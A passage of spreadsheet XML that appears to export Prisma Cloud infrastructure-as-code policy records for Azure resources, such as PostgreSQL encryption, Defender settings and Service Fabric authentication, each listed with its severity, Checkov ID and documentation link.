          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-that-postgresql-server-enables-infrastructure-encryption</t>
        </is>
      </c>
      <c r="Y920" t="inlineStr"/>
      <c r="Z920" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_postgresql_server"]}</t>
        </is>
      </c>
      <c r="AA920" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB920" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC920" t="inlineStr">
        <is>
          <t>CKV_AZURE_130</t>
        </is>
      </c>
      <c r="AD920" t="b">
        <v>1</v>
      </c>
      <c r="AE920" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF920" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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0" t="inlineStr">
        <is>
          <t>c6c340a1-e862-4d18-b031-5d12a6ab90b1</t>
        </is>
      </c>
      <c r="AI920" t="inlineStr"/>
      <c r="AJ920" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK920" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="921">
      <c r="A921" t="inlineStr"/>
      <c r="B921" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C921" s="2" t="inlineStr"/>
      <c r="D921" t="inlineStr"/>
      <c r="E921" t="inlineStr"/>
      <c r="F921" t="inlineStr"/>
      <c r="G921" t="b">
        <v>1</v>
      </c>
      <c r="H9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1" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J921" t="inlineStr">
        <is>
          <t>IaC:General:azure-postgresql</t>
        </is>
      </c>
      <c r="K921" t="inlineStr">
        <is>
          <t>PostgreSQL server does not enable Threat Detection policy</t>
        </is>
      </c>
      <c r="L921" t="inlineStr"/>
      <c r="M921" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N921" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O921" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P921" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q921" t="inlineStr"/>
      <c r="R921" t="inlineStr"/>
      <c r="S921" t="inlineStr"/>
      <c r="T921" t="b">
        <v>0</v>
      </c>
      <c r="U921" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V921" t="inlineStr">
        <is>
          <t>IaC:General:azure-postgresql-server</t>
        </is>
      </c>
      <c r="W921" t="inlineStr">
        <is>
          <t>Ensure that PostgreSQL server enables Threat detection policy</t>
        </is>
      </c>
      <c r="X921" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-that-postgresql-server-enables-threat-detection-policy</t>
        </is>
      </c>
      <c r="Y921" t="inlineStr"/>
      <c r="Z921" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_postgresql_server"]}</t>
        </is>
      </c>
      <c r="AA921" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB921" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC921" t="inlineStr">
        <is>
          <t>CKV_AZURE_128</t>
        </is>
      </c>
      <c r="AD921" t="b">
        <v>1</v>
      </c>
      <c r="AE921" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF921" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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1" t="inlineStr">
        <is>
          <t>736b5486-73e5-4d65-a695-24071db8602a</t>
        </is>
      </c>
      <c r="AI921" t="inlineStr"/>
      <c r="AJ921" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK921" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="922">
      <c r="A922" t="inlineStr"/>
      <c r="B922" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C922" s="2" t="inlineStr"/>
      <c r="D922" t="inlineStr"/>
      <c r="E922" t="inlineStr"/>
      <c r="F922" t="inlineStr"/>
      <c r="G922" t="b">
        <v>1</v>
      </c>
      <c r="H9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2" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J922" t="inlineStr">
        <is>
          <t>IaC:General:azure-postgresql</t>
        </is>
      </c>
      <c r="K922" t="inlineStr">
        <is>
          <t>PostgreSQL server enables geo-redundant backups</t>
        </is>
      </c>
      <c r="L922" t="inlineStr"/>
      <c r="M922" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N922" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O922" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P922" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q922" t="inlineStr"/>
      <c r="R922" t="inlineStr"/>
      <c r="S922" t="inlineStr"/>
      <c r="T922" t="b">
        <v>0</v>
      </c>
      <c r="U922" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V922" t="inlineStr">
        <is>
          <t>IaC:General:azure-postgresql-server</t>
        </is>
      </c>
      <c r="W922" t="inlineStr">
        <is>
          <t>Ensure that PostgreSQL server enables geo-redundant backups</t>
        </is>
      </c>
      <c r="X922" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-that-postgresql-server-enables-geo-redundant-backups</t>
        </is>
      </c>
      <c r="Y922" t="inlineStr"/>
      <c r="Z922" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_postgresql_server"]}</t>
        </is>
      </c>
      <c r="AA922" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB922" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC922" t="inlineStr">
        <is>
          <t>CKV_AZURE_102</t>
        </is>
      </c>
      <c r="AD922" t="b">
        <v>1</v>
      </c>
      <c r="AE922" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF922" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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2" t="inlineStr">
        <is>
          <t>28bac534-b4d1-464d-8ad9-3ed011d53f32</t>
        </is>
      </c>
      <c r="AI922" t="inlineStr"/>
      <c r="AJ922" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK922" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="923">
      <c r="A923" t="inlineStr"/>
      <c r="B923" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C923" s="2" t="inlineStr"/>
      <c r="D923" t="inlineStr"/>
      <c r="E923" t="inlineStr"/>
      <c r="F923" t="inlineStr"/>
      <c r="G923" t="b">
        <v>1</v>
      </c>
      <c r="H9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3" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J923" t="inlineStr">
        <is>
          <t>IaC:General:azure-postgresql</t>
        </is>
      </c>
      <c r="K923" t="inlineStr">
        <is>
          <t>PostgreSQL server does not enable customer-managed key for encryption</t>
        </is>
      </c>
      <c r="L923" t="inlineStr"/>
      <c r="M923" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N923" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O923" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P923" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q923" t="inlineStr"/>
      <c r="R923" t="inlineStr"/>
      <c r="S923" t="inlineStr"/>
      <c r="T923" t="b">
        <v>0</v>
      </c>
      <c r="U923" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V923" t="inlineStr">
        <is>
          <t>IaC:General:azure-postgresql-server-key,azure-postgresql-server</t>
        </is>
      </c>
      <c r="W923" t="inlineStr">
        <is>
          <t>Ensure that PostgreSQL server enables customer-managed key for encryption</t>
        </is>
      </c>
      <c r="X923" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-that-postgresql-server-enables-customer-managed-key-for-encryption</t>
        </is>
      </c>
      <c r="Y923" t="inlineStr"/>
      <c r="Z923" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_postgresql_server_key","azurerm_postgresql_server"]}</t>
        </is>
      </c>
      <c r="AA923" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB923" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC923" t="inlineStr">
        <is>
          <t>CKV2_AZURE_17</t>
        </is>
      </c>
      <c r="AD923" t="b">
        <v>1</v>
      </c>
      <c r="AE923" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF923" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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3" t="inlineStr">
        <is>
          <t>4e6e26f4-c923-4eed-b947-2646f6d677d2</t>
        </is>
      </c>
      <c r="AI923" t="inlineStr"/>
      <c r="AJ923" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK923" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="924">
      <c r="A924" t="inlineStr"/>
      <c r="B924" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C924" s="2" t="inlineStr"/>
      <c r="D924" t="inlineStr"/>
      <c r="E924" t="inlineStr"/>
      <c r="F924" t="inlineStr"/>
      <c r="G924" t="b">
        <v>1</v>
      </c>
      <c r="H9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4" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J924" t="inlineStr">
        <is>
          <t>IaC:General:azure-search</t>
        </is>
      </c>
      <c r="K924" t="inlineStr">
        <is>
          <t>Azure Cognitive Search Without SLA for Search Index Queries</t>
        </is>
      </c>
      <c r="L924" t="inlineStr"/>
      <c r="M924" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N924" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O924" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P924" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q924" t="inlineStr"/>
      <c r="R924" t="inlineStr"/>
      <c r="S924" t="inlineStr"/>
      <c r="T924" t="b">
        <v>0</v>
      </c>
      <c r="U924" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V924" t="inlineStr">
        <is>
          <t>IaC:General:azure-search-service</t>
        </is>
      </c>
      <c r="W924" t="inlineStr">
        <is>
          <t>Ensure that Azure Cognitive Search maintains SLA for search index queries</t>
        </is>
      </c>
      <c r="X924" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.paloaltonetworks.com/prisma/prisma-cloud/prisma-cloud-code-security-policy-reference/azure-policies/azure-general-policies/azr-general-209</t>
        </is>
      </c>
      <c r="Y924" t="inlineStr"/>
      <c r="Z924" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_search_service"]}</t>
        </is>
      </c>
      <c r="AA924" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB924" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC924" t="inlineStr">
        <is>
          <t>CKV_AZURE_209</t>
        </is>
      </c>
      <c r="AD924" t="b">
        <v>1</v>
      </c>
      <c r="AE924" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF924" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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4" t="inlineStr">
        <is>
          <t>b8ad8d3c-d85d-4a93-984b-0799f9c49598</t>
        </is>
      </c>
      <c r="AI924" t="inlineStr"/>
      <c r="AJ924" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK924" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="925">
      <c r="A925" t="inlineStr"/>
      <c r="B925" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C925" s="2" t="inlineStr"/>
      <c r="D925" t="inlineStr"/>
      <c r="E925" t="inlineStr"/>
      <c r="F925" t="inlineStr"/>
      <c r="G925" t="b">
        <v>1</v>
      </c>
      <c r="H9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5" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J925" t="inlineStr">
        <is>
          <t>IaC:General:azure-search</t>
        </is>
      </c>
      <c r="K925" t="inlineStr">
        <is>
          <t>Azure Cognitive Search Without SLA Index Updates</t>
        </is>
      </c>
      <c r="L925" t="inlineStr"/>
      <c r="M925" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N925" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O925" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P925" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q925" t="inlineStr"/>
      <c r="R925" t="inlineStr"/>
      <c r="S925" t="inlineStr"/>
      <c r="T925" t="b">
        <v>0</v>
      </c>
      <c r="U925" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V925" t="inlineStr">
        <is>
          <t>IaC:General:azure-search-service</t>
        </is>
      </c>
      <c r="W925" t="inlineStr">
        <is>
          <t>Ensure that Azure Cognitive Search maintains SLA for index updates</t>
        </is>
      </c>
      <c r="X925" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.paloaltonetworks.com/prisma/prisma-cloud/prisma-cloud-code-security-policy-reference/azure-policies/azure-general-policies/azr-general-208</t>
        </is>
      </c>
      <c r="Y925" t="inlineStr"/>
      <c r="Z925" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_search_service"]}</t>
        </is>
      </c>
      <c r="AA925" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB925" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC925" t="inlineStr">
        <is>
          <t>CKV_AZURE_208</t>
        </is>
      </c>
      <c r="AD925" t="b">
        <v>1</v>
      </c>
      <c r="AE925" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF925" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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5" t="inlineStr">
        <is>
          <t>6134bd00-982b-4d83-a444-0296cef1e2e1</t>
        </is>
      </c>
      <c r="AI925" t="inlineStr"/>
      <c r="AJ925" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK925" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="926">
      <c r="A926" t="inlineStr"/>
      <c r="B926" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C926" s="2" t="inlineStr"/>
      <c r="D926" t="inlineStr"/>
      <c r="E926" t="inlineStr"/>
      <c r="F926" t="inlineStr"/>
      <c r="G926" t="b">
        <v>1</v>
      </c>
      <c r="H9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6" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J926" t="inlineStr">
        <is>
          <t>IaC:General:azure-security</t>
        </is>
      </c>
      <c r="K926" t="inlineStr">
        <is>
          <t>Azure Security Center Defender set to Off for Kubernetes</t>
        </is>
      </c>
      <c r="L926" t="inlineStr"/>
      <c r="M926" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N926" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O926" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P926" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q926" t="inlineStr"/>
      <c r="R926" t="inlineStr"/>
      <c r="S926" t="inlineStr"/>
      <c r="T926" t="b">
        <v>0</v>
      </c>
      <c r="U926" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V926" t="inlineStr">
        <is>
          <t>IaC:General:azure-security-center-subscription-pricing</t>
        </is>
      </c>
      <c r="W926" t="inlineStr">
        <is>
          <t>Ensure that Azure Defender is set to On for Kubernetes</t>
        </is>
      </c>
      <c r="X926" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-defender-is-set-to-on-for-kubernetes</t>
        </is>
      </c>
      <c r="Y926" t="inlineStr"/>
      <c r="Z926" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_security_center_subscription_pricing"]}</t>
        </is>
      </c>
      <c r="AA926" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB926" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC926" t="inlineStr">
        <is>
          <t>CKV_AZURE_85</t>
        </is>
      </c>
      <c r="AD926" t="b">
        <v>1</v>
      </c>
      <c r="AE926" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF926" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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6" t="inlineStr">
        <is>
          <t>f44b3781-8c35-4166-8772-36e61c5314e6</t>
        </is>
      </c>
      <c r="AI926" t="inlineStr"/>
      <c r="AJ926" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK926" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="927">
      <c r="A927" t="inlineStr"/>
      <c r="B927" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C927" s="2" t="inlineStr"/>
      <c r="D927" t="inlineStr"/>
      <c r="E927" t="inlineStr"/>
      <c r="F927" t="inlineStr"/>
      <c r="G927" t="b">
        <v>1</v>
      </c>
      <c r="H9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7" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J927" t="inlineStr">
        <is>
          <t>IaC:General:azure-security</t>
        </is>
      </c>
      <c r="K927" t="inlineStr">
        <is>
          <t>Azure Microsoft Defender for Cloud is set to Off for Container Registries</t>
        </is>
      </c>
      <c r="L927" t="inlineStr"/>
      <c r="M927" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N927" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O927" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P927" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q927" t="inlineStr"/>
      <c r="R927" t="inlineStr"/>
      <c r="S927" t="inlineStr"/>
      <c r="T927" t="b">
        <v>0</v>
      </c>
      <c r="U927" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V927" t="inlineStr">
        <is>
          <t>IaC:General:azure-security-center-subscription-pricing</t>
        </is>
      </c>
      <c r="W927" t="inlineStr">
        <is>
          <t>Ensure that Azure Defender is set to On for Container Registries</t>
        </is>
      </c>
      <c r="X927" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-defender-is-set-to-on-for-container-registries</t>
        </is>
      </c>
      <c r="Y927" t="inlineStr"/>
      <c r="Z927" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_security_center_subscription_pricing"]}</t>
        </is>
      </c>
      <c r="AA927" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB927" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC927" t="inlineStr">
        <is>
          <t>CKV_AZURE_86</t>
        </is>
      </c>
      <c r="AD927" t="b">
        <v>1</v>
      </c>
      <c r="AE927" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF927" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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7" t="inlineStr">
        <is>
          <t>be240ec3-9d49-4f6b-a40c-fd1bf1bf0783</t>
        </is>
      </c>
      <c r="AI927" t="inlineStr"/>
      <c r="AJ927" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK927" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="928">
      <c r="A928" t="inlineStr"/>
      <c r="B928" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C928" s="2" t="inlineStr"/>
      <c r="D928" t="inlineStr"/>
      <c r="E928" t="inlineStr"/>
      <c r="F928" t="inlineStr"/>
      <c r="G928" t="b">
        <v>1</v>
      </c>
      <c r="H9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8" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J928" t="inlineStr">
        <is>
          <t>IaC:General:azure-service</t>
        </is>
      </c>
      <c r="K928" t="inlineStr">
        <is>
          <t>Active Directory is not used for authentication for Service Fabric</t>
        </is>
      </c>
      <c r="L928" t="inlineStr"/>
      <c r="M928" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N928" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O928" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P928" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q928" t="inlineStr"/>
      <c r="R928" t="inlineStr"/>
      <c r="S928" t="inlineStr"/>
      <c r="T928" t="b">
        <v>0</v>
      </c>
      <c r="U928" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V928" t="inlineStr">
        <is>
          <t>IaC:General:azure-service-fabric-cluster</t>
        </is>
      </c>
      <c r="W928" t="inlineStr">
        <is>
          <t>Ensures that Active Directory is used for authentication for Service Fabric</t>
        </is>
      </c>
      <c r="X928" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-that-active-directory-is-used-for-service-fabric-authentication</t>
        </is>
      </c>
      <c r="Y928" t="inlineStr"/>
      <c r="Z928" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_service_fabric_cluster"]}</t>
        </is>
      </c>
      <c r="AA928" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB928" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC928" t="inlineStr">
        <is>
          <t>CKV_AZURE_125</t>
        </is>
      </c>
      <c r="AD928" t="b">
        <v>1</v>
      </c>
      <c r="AE928" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF928" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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8" t="inlineStr">
        <is>
          <t>a34620b2-df70-4dfc-964d-dde263c6c80f</t>
        </is>
      </c>
      <c r="AI928" t="inlineStr"/>
      <c r="AJ928" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK928" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="929">
      <c r="A929" t="inlineStr"/>
      <c r="B929" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C929" s="2" t="inlineStr"/>
      <c r="D929" t="inlineStr"/>
      <c r="E929" t="inlineStr"/>
      <c r="F929" t="inlineStr"/>
      <c r="G929" t="b">
        <v>1</v>
      </c>
      <c r="H9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29" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J929" t="inlineStr">
        <is>
          <t>IaC:General:azure-service</t>
        </is>
      </c>
      <c r="K929" t="inlineStr">
        <is>
          <t>Azure App Service Plan is Not Suitable for Production</t>
        </is>
      </c>
      <c r="L929" t="inlineStr"/>
      <c r="M929" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N929" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O929" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P929" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q929" t="inlineStr"/>
      <c r="R929" t="inlineStr"/>
      <c r="S929" t="inlineStr"/>
      <c r="T929" t="b">
        <v>0</v>
      </c>
      <c r="U929" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V929" t="inlineStr">
        <is>
          <t>IaC:General:azure-service-plan</t>
        </is>
      </c>
      <c r="W929" t="inlineStr">
        <is>
          <t>Ensure App Service plan suitable for production use</t>
        </is>
      </c>
      <c r="X929" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.paloaltonetworks.com/prisma/prisma-cloud/prisma-cloud-code-security-policy-reference/azure-policies/azure-general-policies/azr-general-211</t>
        </is>
      </c>
      <c r="Y929" t="inlineStr"/>
      <c r="Z929" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_service_plan"]}</t>
        </is>
      </c>
      <c r="AA929" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB929" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC929" t="inlineStr">
        <is>
          <t>CKV_AZURE_211</t>
        </is>
      </c>
      <c r="AD929" t="b">
        <v>1</v>
      </c>
      <c r="AE929" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF929" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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29" t="inlineStr">
        <is>
          <t>f635e743-fbc3-419f-ae00-2324baa5139f</t>
        </is>
      </c>
      <c r="AI929" t="inlineStr"/>
      <c r="AJ929" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK929" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="930">
      <c r="A930" t="inlineStr"/>
      <c r="B930" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C930" s="2" t="inlineStr"/>
      <c r="D930" t="inlineStr"/>
      <c r="E930" t="inlineStr"/>
      <c r="F930" t="inlineStr"/>
      <c r="G930" t="b">
        <v>1</v>
      </c>
      <c r="H9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0" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J930" t="inlineStr">
        <is>
          <t>IaC:General:azure-service</t>
        </is>
      </c>
      <c r="K930" t="inlineStr">
        <is>
          <t>Azure App Service Instance Lacks Redundancy</t>
        </is>
      </c>
      <c r="L930" t="inlineStr"/>
      <c r="M930" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N930" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O930" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P930" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q930" t="inlineStr"/>
      <c r="R930" t="inlineStr"/>
      <c r="S930" t="inlineStr"/>
      <c r="T930" t="b">
        <v>0</v>
      </c>
      <c r="U930" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V930" t="inlineStr">
        <is>
          <t>IaC:General:azure-service-plan</t>
        </is>
      </c>
      <c r="W930" t="inlineStr">
        <is>
          <t>Ensure App Service has a minimum number of instances for failover</t>
        </is>
      </c>
      <c r="X930" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.paloaltonetworks.com/prisma/prisma-cloud/prisma-cloud-code-security-policy-reference/azure-policies/azure-general-policies/azr-general-212</t>
        </is>
      </c>
      <c r="Y930" t="inlineStr"/>
      <c r="Z930" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_service_plan"]}</t>
        </is>
      </c>
      <c r="AA930" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB930" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC930" t="inlineStr">
        <is>
          <t>CKV_AZURE_212</t>
        </is>
      </c>
      <c r="AD930" t="b">
        <v>1</v>
      </c>
      <c r="AE930" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF930" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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0" t="inlineStr">
        <is>
